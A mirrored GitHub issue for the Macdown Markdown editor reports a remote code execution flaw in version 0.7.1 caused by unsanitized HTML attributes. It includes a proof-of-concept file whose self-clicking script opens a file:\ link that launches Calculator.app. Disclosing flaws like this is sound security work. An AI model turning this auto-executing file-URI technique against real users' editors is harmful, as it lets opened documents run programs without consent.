MacDownApp/macdown

Macdown Version 0.7.1 (870) Remote Code Execution

Open

#1 050 ouverte le 28 janv. 2019

Voir sur GitHub
 (7 commentaires) (1 réaction) (0 assignés)Objective-C (930 forks)batch import
help wantedon hold

Métriques du dépôt

Stars
 (7 686 stars)
Métriques de merge PR
 (Aucune PR mergée en 30 j)

Description

Macdown Version 0.7.1 (870) Remote Code Execution

Macdown version 0.7.1 (870) is affected by a remote code execution vulnerability. Macdown fails to sanitize input on HTML attributes. Abusing thefile:\\ URI scheme on HTML attributes can result in arbitrary code execution. The attached proof of concept will execute the MacOS Calculator.app when opened inside of Macdown.

PoC (PoC.md):

<!DOCTYPE html>
<html>
<body>

<a href="file:\\\Applications\Calculator.app" id=exploit download>
  <img src="/images/exploit.jpg" alt="exploit" width="104" height="142">
</a>

<script>
(function download() {
    document.getElementById('exploit').click();
})()
</script>

</body>
</html>

Screenshot:

PoC.md.zip

Guide contributeur